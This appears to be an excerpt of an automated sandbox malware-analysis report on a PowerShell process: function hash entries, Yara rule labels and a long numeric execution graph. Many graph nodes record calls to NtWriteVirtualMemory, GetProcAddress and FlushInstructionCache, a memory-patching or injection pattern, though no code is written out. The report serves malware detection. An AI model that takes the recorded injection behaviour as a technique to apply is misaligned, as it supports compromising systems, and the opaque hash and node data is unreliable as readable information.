                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: `^q$`^q$`^q$`^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4294711580
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c12f0de37d0251d402adfeccf522b921eda18686fb42bf2caab3fc05d0c4d9d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 48d4b34dcb7c781c8e46594176021f6169d7b9cd785487429c7854330b4ec3c7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c12f0de37d0251d402adfeccf522b921eda18686fb42bf2caab3fc05d0c4d9d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9817374E012199FDB54DFA9D990A9DFBF6FF48300F24822AD819AB315E730A945CF90
                                                                                                                                                                                                                                                                                                                                  Function 07E433D8 Relevance: 5.1, Strings: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ,SMk$,SMk$p5=j$RMk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-842928944
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: baf5a44496d3d46a6231923affad8506e691babe769410f039ba0710d7dccdbc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 836c0cf7ac0dc2e3a496d64da64f487b918ccbdebe8dd67e7def0de042beb61f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baf5a44496d3d46a6231923affad8506e691babe769410f039ba0710d7dccdbc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 774139B1B053059FCB219B6CA810BEABFE6DF86314F14807BD559EB381DA35D880C7A1
                                                                                                                                                                                                                                                                                                                                  Function 07E45798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-858218434
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 06a251cdeceb00bc2d435fbbdbe18bb68fe603d7a57a374cfbcd602c1b13f3bd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 54b772281cfb2c4a2c90ad89ddeab7f0515da128506b70c4c985ddef956617d1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06a251cdeceb00bc2d435fbbdbe18bb68fe603d7a57a374cfbcd602c1b13f3bd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB216BB23013069BDB34596EAC54B77BBD6ABC5715F24843AEA05CF281DD35C850C361
                                                                                                                                                                                                                                                                                                                                  Function 07E40323 Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-978391646
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a299070ecd1a26676ee4574714f3a4df3bc7d26754cfa01c92b717ebc1fb2935
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ba741e0e06cd8d3a99082c3fb33af15bb6868eedfefb467154bc6a18bd704ba7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a299070ecd1a26676ee4574714f3a4df3bc7d26754cfa01c92b717ebc1fb2935
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF05C75B1151A9BC73C211C35701B96AD7AFC0E5473549BBC9919B344CD254C4243DB
                                                                                                                                                                                                                                                                                                                                  Function 07E42123 Relevance: 5.0, Strings: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $]q$$]q$JNk$JNk
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1526425236
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 64da0531ba1482471fd8e4625dbe032d2759bd82e2cbbd6b7a1dde2820a40123
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b93ea17daafbec40e4c117ae90f3a10624ba75c2e1ef9e4ed659a61f90d36aec
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64da0531ba1482471fd8e4625dbe032d2759bd82e2cbbd6b7a1dde2820a40123
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDF0E9B17512014BD938054D7C1095B93EFBBD0A94B14552BEB515B318CD358886C3A5

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:8.6%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:1346
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:12
                                                                                                                                                                                                                                                                                                                                  execution_graph 28286 2d0c350 28289 2cff7c8 28286->28289 28288 2d0c358 28290 2cff7d0 28289->28290 28290->28290 29414 2cf88b8 28290->29414 28292 2cff7f1 28293 2cff7f6 28292->28293 28294 2cff850 28293->28294 28295 2cff87b 28294->28295 29420 2cf89d0 28295->29420 28297 2cff88e 28298 2cff8b4 28297->28298 28299 2cff8df 28298->28299 28300 2cf89d0 4 API calls 28299->28300 28301 2cff8f2 28300->28301 28302 2cff918 28301->28302 28303 2cff922 28302->28303 28304 2cf89d0 4 API calls 28303->28304 28305 2cff956 28304->28305 28306 2cff986 28305->28306 28307 2cf89d0 4 API calls 28306->28307 28308 2cff9ba 28307->28308 28309 2cff9ea 28308->28309 28310 2cf89d0 4 API calls 28309->28310 28311 2cffa1e 28310->28311 28312 2cffa3c 28311->28312 28313 2cffa4e 28312->28313 28314 2cf89d0 4 API calls 28313->28314 28315 2cffa82 28314->28315 28316 2cffaa0 28315->28316 28317 2cffad3 28316->28317 28318 2cf89d0 4 API calls 28317->28318 28319 2cffae6 28318->28319 28320 2cffaf3 28319->28320 28321 2d0b2f8 28319->28321 29430 2cff744 28320->29430 28323 2cffaf8 28323->28321 28324 2cffb1e 28323->28324 28325 2cf89d0 4 API calls 28324->28325 28326 2cffb27 28325->28326 28327 2cf89d0 4 API calls 28326->28327 28328 2cffb4e 28327->28328 28329 2cf89d0 4 API calls 28328->28329 28330 2cffb81 28329->28330 28331 2cffbd9 28330->28331 28332 2cffbf1 28331->28332 28333 2cf89d0 4 API calls 28332->28333 28334 2cffbfd 28333->28334 28335 2cf89d0 4 API calls 28334->28335 28336 2cffc30 28335->28336 28337 2cffc40 28336->28337 28338 2cf89d0 4 API calls 28337->28338 28339 2cffc63 28338->28339 28340 2cf89d0 4 API calls 28339->28340 28341 2cffc96 28340->28341 28342 2cffcf9 28341->28342 28343 2cffd06 28342->28343 28344 2cf89d0 4 API calls 28343->28344 28345 2cffd12 28344->28345 28346 2cffd75 28345->28346 28347 2cf89d0 4 API calls 28346->28347 28348 2cffd8e 28347->28348 28349 2cf89d0 4 API calls 28348->28349 28350 2cffdc1 28349->28350 28351 2cf89d0 4 API calls 28350->28351 28352 2cffdf4 28351->28352 28353 2cf89d0 4 API calls 28352->28353 28354 2cffe27 28353->28354 28355 2cffe48 28354->28355 28356 2cffe7f 28355->28356 28357 2cf89d0 4 API calls 28356->28357 28358 2cffea3 28357->28358 28359 2cffeb3 28358->28359 28360 2cf89d0 4 API calls 28359->28360 28361 2cffed6 28360->28361 28362 2cf89d0 4 API calls 28361->28362 28363 2cfff09 28362->28363 28364 2cfff30 28363->28364 28365 2cf89d0 4 API calls 28364->28365 28366 2cfff3c 28365->28366 28367 2cfff94 28366->28367 28368 2cf89d0 4 API calls 28367->28368 28369 2cfffb8 28368->28369 28370 2cfffe4 28369->28370 28371 2cf89d0 4 API calls 28370->28371 28372 2d00034 28371->28372 28373 2d0005b 28372->28373 28374 2cf89d0 4 API calls 28373->28374 28375 2d00067 28374->28375 28376 2cf89d0 4 API calls 28375->28376 28377 2d0009a 28376->28377 28378 2cf89d0 4 API calls 28377->28378 28379 2d000cd 28378->28379 28380 2cf89d0 4 API calls 28379->28380 28381 2d00149 28380->28381 28382 2cf89d0 4 API calls 28381->28382 28383 2d001c5 28382->28383 28384 2cf89d0 4 API calls 28383->28384 28385 2d00241 28384->28385 28386 2cf89d0 4 API calls 28385->28386 28387 2d002bd 28386->28387 28388 2d002cc 28387->28388 28389 2d00327 28388->28389 28390 2d0033f 28389->28390 28391 2cf89d0 4 API calls 28390->28391 28392 2d00382 28391->28392 28393 2d003a3 28392->28393 28394 2d003bb 28393->28394 28395 2cf89d0 4 API calls 28394->28395 28396 2d003fe 28395->28396 28397 2d00414 28396->28397 28398 2d00534 28397->28398 28399 2d00427 28397->28399 28401 2d00555 28398->28401 28400 2d00448 28399->28400 28403 2cf89d0 4 API calls 28400->28403 28402 2cf89d0 4 API calls 28401->28402 28405 2d005b0 28402->28405 28404 2d004a3 28403->28404 28406 2d004c4 28404->28406 28407 2d005d1 28405->28407 28409 2cf89d0 4 API calls 28406->28409 28408 2cf89d0 4 API calls 28407->28408 28410 2d0051f 28408->28410 28409->28410 28411 2d0052f 28410->28411 28412 2d0066d 28411->28412 28413 2cf89d0 4 API calls 28412->28413 28414 2d006c8 28413->28414 28415 2d006e9 28414->28415 28416 2cf89d0 4 API calls 28415->28416 28417 2d00744 28416->28417 28418 2d00751 28417->28418 28419 2d00794 28418->28419 28420 2d007ec 28419->28420 28421 2d00804 28420->28421 28422 2cf89d0 4 API calls 28421->28422 28423 2d00810 28422->28423 28424 2d00880 28423->28424 28425 2cf89d0 4 API calls 28424->28425 28426 2d0088c 28425->28426 28427 2d008fc 28426->28427 28428 2cf89d0 4 API calls 28427->28428 28429 2d00908 28428->28429 28430 2d00978 28429->28430 28431 2cf89d0 4 API calls 28430->28431 28432 2d00984 28431->28432 28433 2d009c5 28432->28433 28434 2d009fc 28433->28434 28435 2d00a07 28434->28435 28436 2cf89d0 4 API calls 28435->28436 28437 2d00a20 28436->28437 28438 2d00a41 28437->28438 28439 2d00a4c 28438->28439 28440 2d00a78 28439->28440 28441 2d00a83 28440->28441 28442 2cf89d0 4 API calls 28441->28442 28443 2d00a9c 28442->28443 28444 2d00abd 28443->28444 28445 2d00ac8 28444->28445 28446 2d00aff 28445->28446 28447 2cf89d0 4 API calls 28446->28447 28448 2d00b18 28447->28448 28449 2d00b22 28448->28449 28450 2d00b2f 28449->28450 28451 2d00b42 28450->28451 28452 2d012fe 28450->28452 28454 2d00b63 28451->28454 28453 2d0132a 28452->28453 28455 2d01337 28453->28455 28457 2d00b9a 28454->28457 28456 2d01356 28455->28456 28458 2d0136e 28456->28458 28459 2d00bb2 28457->28459 28460 2cf89d0 4 API calls 28458->28460 28461 2cf89d0 4 API calls 28459->28461 28463 2d0137a 28460->28463 28462 2d00bbe 28461->28462 28466 2d00bdf 28462->28466 28464 2d013a6 28463->28464 28465 2d013b3 28464->28465 28467 2d013d2 28465->28467 28468 2d00c16 28466->28468 28469 2d013ea 28467->28469 28470 2d00c2e 28468->28470 28471 2cf89d0 4 API calls 28469->28471 28472 2cf89d0 4 API calls 28470->28472 28475 2d013f6 28471->28475 28473 2d00c3a 28472->28473 28474 2d00c5b 28473->28474 28476 2d00c66 28474->28476 28477 2d0142f 28475->28477 28479 2d00c92 28476->28479 28478 2d0144e 28477->28478 28480 2d01466 28478->28480 28482 2cf89d0 4 API calls 28479->28482 28481 2cf89d0 4 API calls 28480->28481 28483 2d01472 28481->28483 28484 2d00cb6 28482->28484 28486 2d01494 28483->28486 28485 2d00cd8 28484->28485 28487 2d00d09 28485->28487 28489 2d014d0 28486->28489 28488 2d00d14 28487->28488 28492 2d00d40 28488->28492 28490 2d014fc 28489->28490 28491 2d01507 28490->28491 28494 2d01514 28491->28494 28493 2d00d58 28492->28493 28496 2cf89d0 4 API calls 28493->28496 28495 2cf89d0 4 API calls 28494->28495 28498 2d01520 28495->28498 28497 2d00d64 28496->28497 28499 2d00d85 28497->28499 28500 2d0154c 28498->28500 28503 2d00d90 28499->28503 28501 2d01578 28500->28501 28502 2d01583 28501->28502 28505 2d01590 28502->28505 28504 2d00dd4 28503->28504 28507 2cf89d0 4 API calls 28504->28507 28506 2cf89d0 4 API calls 28505->28506 28508 2d0159c 28506->28508 28509 2d00de0 28507->28509 28511 2d015c8 28508->28511 29434 2ce4860 28509->29434 28515 2d015ff 28511->28515 28512 2d00e01 28513 2d00e43 28512->28513 28514 2d00e50 28513->28514 28517 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28514->28517 28516 2cf89d0 4 API calls 28515->28516 28520 2d01618 28516->28520 28518 2d00e5c 28517->28518 28519 2d00e71 28518->28519 28523 2d00e84 28519->28523 28521 2d01640 28520->28521 28522 2d01661 28521->28522 28524 2d01679 28522->28524 28525 2d00ebd 28523->28525 28528 2d016a3 28524->28528 28526 2d00ee7 28525->28526 28527 2d00ef4 28526->28527 28530 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28527->28530 28529 2cf89d0 4 API calls 28528->28529 28531 2d016bc 28529->28531 28532 2d00f00 28530->28532 28533 2d016dd 28531->28533 28534 2d00f39 28532->28534 28537 2d0171f 28533->28537 28535 2d00f63 28534->28535 28536 2d00f70 28535->28536 28539 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28536->28539 28538 2cf89d0 4 API calls 28537->28538 28542 2d01738 28538->28542 28540 2d00f7c 28539->28540 28541 2d00f9d 28540->28541 28544 2d012f9 28540->28544 28546 2d00fbe 28541->28546 28543 2d01790 28542->28543 28545 2d0179b 28543->28545 28548 2d02b11 28544->28548 28547 2d017a8 28545->28547 28551 2d00ff5 28546->28551 28549 2cf89d0 4 API calls 28547->28549 28553 2d02b3b 28548->28553 28550 2d017b4 28549->28550 28556 2d017c3 28550->28556 28552 2d0100d 28551->28552 28555 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28552->28555 28554 2cf89d0 4 API calls 28553->28554 28559 2d02b54 28554->28559 28557 2d01019 28555->28557 28561 2d017fe 28556->28561 28558 2d0103a 28557->28558 28560 2d01045 28558->28560 28564 2d02b8d 28559->28564 28565 2d01071 28560->28565 28562 2d0182a 28561->28562 28563 2d01835 28562->28563 28566 2d01842 28563->28566 28567 2d02bc4 28564->28567 28568 2d01089 28565->28568 28569 2cf89d0 4 API calls 28566->28569 28571 2cf89d0 4 API calls 28567->28571 28572 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28568->28572 28570 2d0184e 28569->28570 28576 2d0187a 28570->28576 28575 2d02bd0 28571->28575 28573 2d01095 28572->28573 28574 2d010b6 28573->28574 28580 2d010c1 28574->28580 28579 2d02c09 28575->28579 28577 2d018a6 28576->28577 28578 2d018b1 28577->28578 28581 2d018be 28578->28581 28584 2d02c40 28579->28584 28582 2d01105 28580->28582 28583 2cf89d0 4 API calls 28581->28583 28587 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28582->28587 28585 2d018ca 28583->28585 28586 2cf89d0 4 API calls 28584->28586 28585->28544 28589 2d018dc 28585->28589 28590 2d02c4c 28586->28590 28588 2d01111 28587->28588 28593 2d01132 28588->28593 28591 2d018fd 28589->28591 28592 2d02c78 28590->28592 28598 2d01915 28591->28598 28594 2d02ca4 28592->28594 28595 2d01174 28593->28595 28596 2d02caf 28594->28596 28597 2d01181 28595->28597 28599 2cf89d0 4 API calls 28596->28599 28600 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28597->28600 28603 2cf89d0 4 API calls 28598->28603 28601 2d02cc8 28599->28601 28602 2d0118d 28600->28602 28601->28321 28607 2d02ced 28601->28607 28604 2d011ae 28602->28604 28605 2d01958 28603->28605 28608 2d011b9 28604->28608 28606 2d01979 28605->28606 28610 2d01991 28606->28610 28612 2d02d26 28607->28612 28609 2d011f0 28608->28609 28611 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28609->28611 28614 2cf89d0 4 API calls 28610->28614 28613 2d01209 28611->28613 28615 2cf89d0 4 API calls 28612->28615 28616 2d01213 28613->28616 28617 2d019d4 28614->28617 28618 2d02d69 28615->28618 28619 2d01220 28616->28619 28620 2d019de 28617->28620 28623 2d02da2 28618->28623 28621 2d0129e 28619->28621 28626 2d01a39 28620->28626 28622 2d012b6 28621->28622 28625 2d012d5 28622->28625 28624 2cf89d0 4 API calls 28623->28624 28629 2d02de5 28624->28629 28627 2d012e0 28625->28627 28628 2d01a70 28626->28628 28631 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28627->28631 28630 2cf89d0 4 API calls 28628->28630 28634 2d02e1e 28629->28634 28632 2d01a7c 28630->28632 28631->28544 28633 2d01a9d 28632->28633 28635 2d01ab5 28633->28635 28636 2d02e55 28634->28636 28638 2d01ad4 28635->28638 28637 2cf89d0 4 API calls 28636->28637 28640 2d02e61 28637->28640 28639 2d01aec 28638->28639 28642 2cf89d0 4 API calls 28639->28642 28641 2d02e8d 28640->28641 28645 2d02e9a 28641->28645 28643 2d01af8 28642->28643 28644 2d01b19 28643->28644 28647 2d01b31 28644->28647 28646 2d02ec4 28645->28646 28648 2cf89d0 4 API calls 28646->28648 28650 2d01b50 28647->28650 28649 2d02edd 28648->28649 28652 2d02ee7 28649->28652 28651 2cf89d0 4 API calls 28650->28651 28653 2d01b74 28651->28653 28656 2d02f09 28652->28656 28654 2d01b95 28653->28654 28655 2d01bad 28654->28655 28658 2d01bcc 28655->28658 28657 2d02f6c 28656->28657 28661 2cf89d0 4 API calls 28657->28661 28659 2d01be4 28658->28659 28660 2cf89d0 4 API calls 28659->28660 28662 2d01bf0 28660->28662 28663 2d02f85 28661->28663 28665 2d01c1c 28662->28665 28664 2d02fb1 28663->28664 28666 2d02fbe 28664->28666 28667 2d01c48 28665->28667 28668 2d02fdd 28666->28668 28669 2d01c53 28667->28669 28670 2d02fe8 28668->28670 28672 2d01c60 28669->28672 28671 2d02ff5 28670->28671 28674 2cf89d0 4 API calls 28671->28674 28673 2cf89d0 4 API calls 28672->28673 28675 2d01c6c 28673->28675 28679 2d03001 28674->28679 28676 2d01c97 28675->28676 28677 2d01cc3 28676->28677 28678 2d01cd0 28677->28678 28680 2d01cef 28678->28680 28681 2d0305a 28679->28681 28682 2d01cfa 28680->28682 28683 2d03091 28681->28683 28684 2cf89d0 4 API calls 28682->28684 28685 2cf89d0 4 API calls 28683->28685 28686 2d01d13 28684->28686 28687 2d0309d 28685->28687 28688 2d01d4c 28686->28688 28689 2d030d6 28687->28689 28691 2d01d76 28688->28691 28690 2d0310d 28689->28690 28693 2cf89d0 4 API calls 28690->28693 28692 2cf89d0 4 API calls 28691->28692 28694 2d01d8f 28692->28694 28696 2d03119 28693->28696 28695 2d01db0 28694->28695 28698 2d01dc8 28695->28698 28697 2d03152 28696->28697 28699 2d03171 28697->28699 28702 2d01df2 28698->28702 28700 2d0317c 28699->28700 28701 2d03189 28700->28701 28703 2cf89d0 4 API calls 28701->28703 28704 2cf89d0 4 API calls 28702->28704 28705 2d03195 28703->28705 28706 2d01e0b 28704->28706 28707 2d031a6 28705->28707 28710 2d01e36 28706->28710 28708 2d031bc 28707->28708 28709 2d031cf 28708->28709 28711 2d031f0 28709->28711 28713 2d01e6d 28710->28713 28712 2d031fb 28711->28712 28714 2d03208 28712->28714 28715 2d01e85 28713->28715 28716 2d03227 28714->28716 28717 2cf89d0 4 API calls 28715->28717 28718 2d03232 28716->28718 28719 2d01e91 28717->28719 28720 2d0323f 28718->28720 28723 2d01eca 28719->28723 28721 2cf89d0 4 API calls 28720->28721 28722 2d0324b 28721->28722 28728 2d0326c 28722->28728 28724 2d01ee9 28723->28724 28725 2d01ef4 28724->28725 28726 2d01f01 28725->28726 28727 2cf89d0 4 API calls 28726->28727 28729 2d01f26 28726->28729 28727->28726 28730 2cf89d0 4 API calls 28728->28730 28732 2d01f52 28729->28732 28731 2d032c7 28730->28731 28734 2d032e8 28731->28734 28733 2d01f7e 28732->28733 28735 2d01f89 28733->28735 28737 2d0331f 28734->28737 28736 2cf89d0 4 API calls 28735->28736 28739 2d01fa2 28736->28739 28738 2cf89d0 4 API calls 28737->28738 28740 2d03343 28738->28740 28741 2d01fce 28739->28741 28744 2d0337c 28740->28744 28742 2d01ffa 28741->28742 28743 2d02005 28742->28743 28745 2cf89d0 4 API calls 28743->28745 28747 2d033b3 28744->28747 28926 2d0201e 28745->28926 28748 2cf89d0 4 API calls 28747->28748 28750 2d033bf 28748->28750 28749 2d02030 28751 2d0205c 28749->28751 28752 2d033dd 28750->28752 28753 2d02088 28751->28753 28756 2d0340a 28752->28756 28754 2d02093 28753->28754 28755 2cf89d0 4 API calls 28754->28755 28757 2d020ac 28755->28757 28762 2d03437 28756->28762 28758 2d020d8 28757->28758 28759 2d02104 28758->28759 28760 2d0210f 28759->28760 28761 2cf89d0 4 API calls 28760->28761 28761->28926 28763 2d034b8 28762->28763 28764 2cf89d0 4 API calls 28763->28764 28767 2d034d1 28764->28767 28765 2d0213f 28766 2d0216b 28765->28766 28771 2d02197 28766->28771 28769 2d03534 28767->28769 28768 2cf89d0 4 API calls 28768->28771 28770 2cf89d0 4 API calls 28769->28770 28773 2d0354d 28770->28773 28771->28768 28772 2d021e7 28771->28772 28778 2d02213 28772->28778 28774 2d03577 28773->28774 28810 2d036eb 28773->28810 28776 2d035a3 28774->28776 28775 2cf89d0 4 API calls 28775->28778 28779 2d035da 28776->28779 28777 2d03739 28780 2d03770 28777->28780 28778->28775 28783 2d0225f 28778->28783 28781 2cf89d0 4 API calls 28779->28781 28782 2cf89d0 4 API calls 28780->28782 28788 2d035f3 28781->28788 28784 2d03789 28782->28784 28787 2d022ae 28783->28787 28785 2d037aa 28784->28785 28790 2d037e1 28785->28790 28786 2cf89d0 4 API calls 28786->28787 28787->28786 28789 2d022e6 28787->28789 28792 2d03656 28788->28792 28791 2d022f3 28789->28791 28794 2cf89d0 4 API calls 28790->28794 28795 2d02312 28791->28795 28793 2cf89d0 4 API calls 28792->28793 28800 2d0366f 28793->28800 28797 2d03805 28794->28797 28796 2d0232a 28795->28796 28798 2cf89d0 4 API calls 28796->28798 28801 2d03859 28797->28801 28799 2d02336 28798->28799 28802 2d02356 28799->28802 28804 2d036d2 28800->28804 28806 2d03890 28801->28806 28803 2d02377 28802->28803 28807 2d02382 28803->28807 28805 2cf89d0 4 API calls 28804->28805 28805->28810 28808 2cf89d0 4 API calls 28806->28808 28809 2d023ae 28807->28809 28811 2d038b4 28808->28811 28812 2d023b9 28809->28812 28810->28777 28815 2d038ed 28811->28815 28813 2cf89d0 4 API calls 28812->28813 28814 2d023f3 28812->28814 28813->28812 28816 2d023fe 28814->28816 28817 2d03924 28815->28817 28819 2d0242a 28816->28819 28818 2cf89d0 4 API calls 28817->28818 28820 2d03930 28818->28820 28821 2d02435 28819->28821 28823 2d0395c 28820->28823 28822 2cf89d0 4 API calls 28821->28822 28824 2d0244e 28822->28824 28825 2d03993 28823->28825 28828 2d0249a 28824->28828 28826 2cf89d0 4 API calls 28825->28826 28827 2d039ac 28826->28827 28831 2d039cd 28827->28831 28829 2d024c6 28828->28829 28830 2d024d1 28829->28830 28833 2d024de 28830->28833 28834 2d03a04 28831->28834 28832 2cf89d0 4 API calls 28832->28833 28833->28832 28836 2d02516 28833->28836 28835 2cf89d0 4 API calls 28834->28835 28844 2d03a28 28835->28844 28837 2d02542 28836->28837 28839 2d0254d 28837->28839 28838 2d05530 28845 2d0555c 28838->28845 28841 2d0255a 28839->28841 28840 2d03a3d 28840->28844 28842 2cf89d0 4 API calls 28841->28842 28843 2d02566 28842->28843 28847 2d0259b 28843->28847 28844->28838 28844->28840 28853 2d03aae 28844->28853 28846 2d05593 28845->28846 28848 2cf89d0 4 API calls 28846->28848 28850 2d025d2 28847->28850 28849 2d055ac 28848->28849 28851 2d055cd 28849->28851 28854 2d025ea 28850->28854 28857 2d05604 28851->28857 28852 2cf89d0 4 API calls 28852->28854 28855 2cf89d0 4 API calls 28853->28855 28854->28852 28856 2d02617 28854->28856 28863 2d03b2a 28855->28863 28858 2d02622 28856->28858 28859 2cf89d0 4 API calls 28857->28859 28861 2d0264e 28858->28861 28860 2d05628 28859->28860 28867 2d05654 28860->28867 28864 2d02666 28861->28864 28862 2cf89d0 4 API calls 28862->28864 28865 2cf89d0 4 API calls 28863->28865 28864->28862 28866 2d02688 28864->28866 28871 2d03ba6 28865->28871 28870 2d0269b 28866->28870 28868 2cf89d0 4 API calls 28867->28868 28869 2d056a4 28868->28869 28875 2d056d0 28869->28875 28872 2d026f3 28870->28872 28873 2cf89d0 4 API calls 28871->28873 28878 2d0270b 28872->28878 28881 2d03c22 28873->28881 28874 2cf89d0 4 API calls 28874->28878 28876 2cf89d0 4 API calls 28875->28876 28877 2d05720 28876->28877 28887 2d05746 28877->28887 28878->28874 28879 2d02750 28878->28879 28880 2d0276f 28879->28880 28882 2d0277a 28880->28882 28883 2cf89d0 4 API calls 28881->28883 28884 2d02787 28882->28884 28893 2d03c9e 28883->28893 28885 2cf89d0 4 API calls 28884->28885 28886 2d02793 28885->28886 28889 2d027c4 28886->28889 28888 2cf89d0 4 API calls 28887->28888 28896 2d057c2 28888->28896 28890 2d027f0 28889->28890 28891 2d027fb 28890->28891 28894 2d02808 28891->28894 28892 2cf89d0 4 API calls 28892->28894 28895 2cf89d0 4 API calls 28893->28895 28894->28892 28898 2d02840 28894->28898 28900 2d03d85 28895->28900 28897 2cf89d0 4 API calls 28896->28897 28902 2d0583e 28897->28902 28925 2d0286c 28898->28925 28899 2d02877 28899->28926 28900->28288 28901 2d028b5 28904 2d0290d 28901->28904 28903 2cf89d0 4 API calls 28902->28903 28908 2d058e6 28903->28908 28906 2d02925 28904->28906 28905 2cf89d0 4 API calls 28905->28906 28906->28905 28907 2d0296a 28906->28907 28909 2d02989 28907->28909 28910 2cf89d0 4 API calls 28908->28910 28911 2d02994 28909->28911 28915 2d05962 28910->28915 28912 2d029a1 28911->28912 28913 2cf89d0 4 API calls 28912->28913 28914 2d029ad 28913->28914 28917 2d029ee 28914->28917 28916 2cf89d0 4 API calls 28915->28916 28922 2d059de 28916->28922 28918 2d02a06 28917->28918 28919 2d02a25 28918->28919 28921 2d02a30 28919->28921 28920 2cf89d0 4 API calls 28920->28921 28921->28920 28924 2d02a6a 28921->28924 28923 2cf89d0 4 API calls 28922->28923 28928 2d05a5a 28923->28928 28924->28925 28925->28899 28926->28544 28926->28706 28926->28749 28926->28765 28926->28901 28927 2cf89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28926->28927 29592 2cfe4b8 NtWriteVirtualMemory 